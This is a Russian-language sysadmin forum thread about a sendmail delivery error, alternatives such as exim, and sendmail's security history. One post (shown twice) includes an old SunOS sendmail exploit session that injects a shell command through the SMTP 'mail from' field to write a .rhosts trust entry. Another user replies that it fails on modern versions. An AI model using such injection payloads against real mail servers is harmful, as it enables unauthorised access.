После установки sendmail и при отправке тестового письма в maillog выдало такой лог
Nov 22 14:21:08 mail2 sendmail[523]: jAMCL8vV000523: from=vovka, size=44, class=0, nrcpts=1, msgid=<200511221221.jAMCL8vV000523@mail2.gloria.com.ua>, relay=root@localhost
Nov 22 14:21:08 mail2 sendmail[523]: jAMCL8vV000523: to=kovrov_v@ukr.net, ctladdr=vovka (1001/1001), delay=00:00:00, xdelay=00:00:00, mailer=relay, pri=30044, relay=[127.0.0.1] [127.0.0.1], dsn=4.0.0, stat=Deferred: Connection refused by [127.0.0.1]
Где-то ошибся с настройками?
sendmail
Владимир, гм... я бы не рекомендовал связываться с sendmail - ИМХО излишне сложная и гибкая система. Поставьте exim + vexim.
exim.org
http://silverwraith.com/vexim/
Про установку exim и всех остальных компонент можно почитать в документации vexim
exim.org
http://silverwraith.com/vexim/
Про установку exim и всех остальных компонент можно почитать в документации vexim
Опыт растет прямо пропорционально выведенному из строя оборудованию
-
Andrei (admin)
- Фанатеющий
- Сообщения: 143
- Зарегистрирован: 05 мар 2003, 13:27
- Контактная информация:
Сколько таких порутал уже 
Pilot, а теперь обоснуйте свою точку зрения пожалуйста...
Надеюсь, никто не станет обвинять авторов openbsd в недостатке паранои?
http://www.openbsd.org/faq/faq1.html#HowAboutWhy is Sendmail included, it is "known insecure"?!
Sendmail has had an imperfect security record, however the Sendmail authors and maintainers have been very receptive to reworking their code to make it much more secure (and this is a sadly uncommon response). The recent security history of Sendmail is not much different than some of the supposedly "more secure" alternatives.
Надеюсь, никто не станет обвинять авторов openbsd в недостатке паранои?
Опыт растет прямо пропорционально выведенному из строя оборудованию
-
Pilot
- Неотъемлемая часть форума
- Сообщения: 370
- Зарегистрирован: 26 янв 2005, 00:19
- Контактная информация:
давно было, но прокатило, правда не совсем по инструкции..
PS ЭТОТ РАЗУМЕЕТСЯ НЕ Я ЛОМАЛ
$ telnet target.remote.com 25
Connecting to 123.456.654.321.
! соединяемся по порту 25 - это SMTP
220 sendmail SMI/4.3.5.2 ready
! версия, которая как известно, содержит ошибку.
helo xxx
220 Helo xxx, ( crack.edu )
mail from: |echo crack.edu/.rhosts@target.remote.com
! подставляем команду вместо обратного адреса.
200 Sender ok.
rcpt to: nosuchuser
! вводим заранее неправильного адресата
500 nosuchuser: user unknown
! несмотря на сообщение, продолжаем диалог.
data
230 Enter mail, end with .
200 Mail accepted
! все, машина взломана....
quit
PS ЭТОТ РАЗУМЕЕТСЯ НЕ Я ЛОМАЛ
$ telnet target.remote.com 25
Connecting to 123.456.654.321.
! соединяемся по порту 25 - это SMTP
220 sendmail SMI/4.3.5.2 ready
! версия, которая как известно, содержит ошибку.
helo xxx
220 Helo xxx, ( crack.edu )
mail from: |echo crack.edu/.rhosts@target.remote.com
! подставляем команду вместо обратного адреса.
200 Sender ok.
rcpt to: nosuchuser
! вводим заранее неправильного адресата
500 nosuchuser: user unknown
! несмотря на сообщение, продолжаем диалог.
data
230 Enter mail, end with .
200 Mail accepted
! все, машина взломана....
quit
-
Samotnik
- Неотъемлемая часть форума
- Сообщения: 295
- Зарегистрирован: 29 июн 2004, 13:19
- Откуда: Вялейскі жулік
- Контактная информация:
Прошу прощения, но насколько я знаю sendmail SMI версии 4.3.5.2 это что-то от Сан ОС 4. Вряд ли таким образом вы сломаете sendmail версии 8.13.х под Linux-ом.
Да Сендмейл был ужасно дырявый, но это было давно. Не думаю, что сейчас вы сломаете сендмейл идущий в дистрибе. Nем более что никто не отменял секюрити апдейты.
По поводу слаквари: Последний секюрити апдейт на сендмейл в этом дистрибе датируется 2003-09-17. Это слакваря 8.х - 9.0 Вот ссылка: http://secunia.com/advisories/9763/
Больше ни в 2004 ни в 2005 годах я не нашёл репортов или апдейтов:
http://www.slackware.com/security/list. ... ity&y=2003
http://www.slackware.com/security/list. ... ity&y=2004
http://www.slackware.com/security/list. ... ity&y=2005
Да Сендмейл был ужасно дырявый, но это было давно. Не думаю, что сейчас вы сломаете сендмейл идущий в дистрибе. Nем более что никто не отменял секюрити апдейты.
По поводу слаквари: Последний секюрити апдейт на сендмейл в этом дистрибе датируется 2003-09-17. Это слакваря 8.х - 9.0 Вот ссылка: http://secunia.com/advisories/9763/
Больше ни в 2004 ни в 2005 годах я не нашёл репортов или апдейтов:
http://www.slackware.com/security/list. ... ity&y=2003
http://www.slackware.com/security/list. ... ity&y=2004
http://www.slackware.com/security/list. ... ity&y=2005
Ти кажеш що ти вільний? Я хочу почути твою виразну волю, а не те, що ти скинув ярмо!
-
Samotnik
- Неотъемлемая часть форума
- Сообщения: 295
- Зарегистрирован: 29 июн 2004, 13:19
- Откуда: Вялейскі жулік
- Контактная информация:
Владимир, по поводу первого сообщения: У меня такое чувство, что либо ваш сендмейл не может найти МХ запись для домена ukr.net (письмо вроде туду уходит) Либо у вас запрещено релеить сообщения, которые приходят с локалхоста.
По поводу последнего поста: http://www.unix.org.ua/orelly/networkin ... h10_08.htm
По поводу последнего поста: http://www.unix.org.ua/orelly/networkin ... h10_08.htm
Ти кажеш що ти вільний? Я хочу почути твою виразну волю, а не те, що ти скинув ярмо!
-
Владимир
- Интересующийся
- Сообщения: 59
- Зарегистрирован: 28 сен 2005, 14:36
- Откуда: Киев
- Контактная информация:
Поясню. Есть один сервер, в работе который, на не стоит линукс, сквид и сендмаил.
Есть второй сервер-тестовый, на нем стоит фрибсд, сквид и сендмаил.
Так вот, я настраиваю сейчас второй сервер, тестовый. Они в одной сети.
Так вот, после всех проб и ошибок, письма на внешние адреса стали вроде уходить (правда возвращаются), но вот если отправить письмо в свой же офис, но в логах всегда user unknow
И еще, я не могу настроить почтовый клиент на этот тестовый сервер.
Пишит, что ненайден pop и smtp сервера. Отсюда вопрос о проверке работы qpopper.
Есть второй сервер-тестовый, на нем стоит фрибсд, сквид и сендмаил.
Так вот, я настраиваю сейчас второй сервер, тестовый. Они в одной сети.
Так вот, после всех проб и ошибок, письма на внешние адреса стали вроде уходить (правда возвращаются), но вот если отправить письмо в свой же офис, но в логах всегда user unknow
И еще, я не могу настроить почтовый клиент на этот тестовый сервер.
Пишит, что ненайден pop и smtp сервера. Отсюда вопрос о проверке работы qpopper.
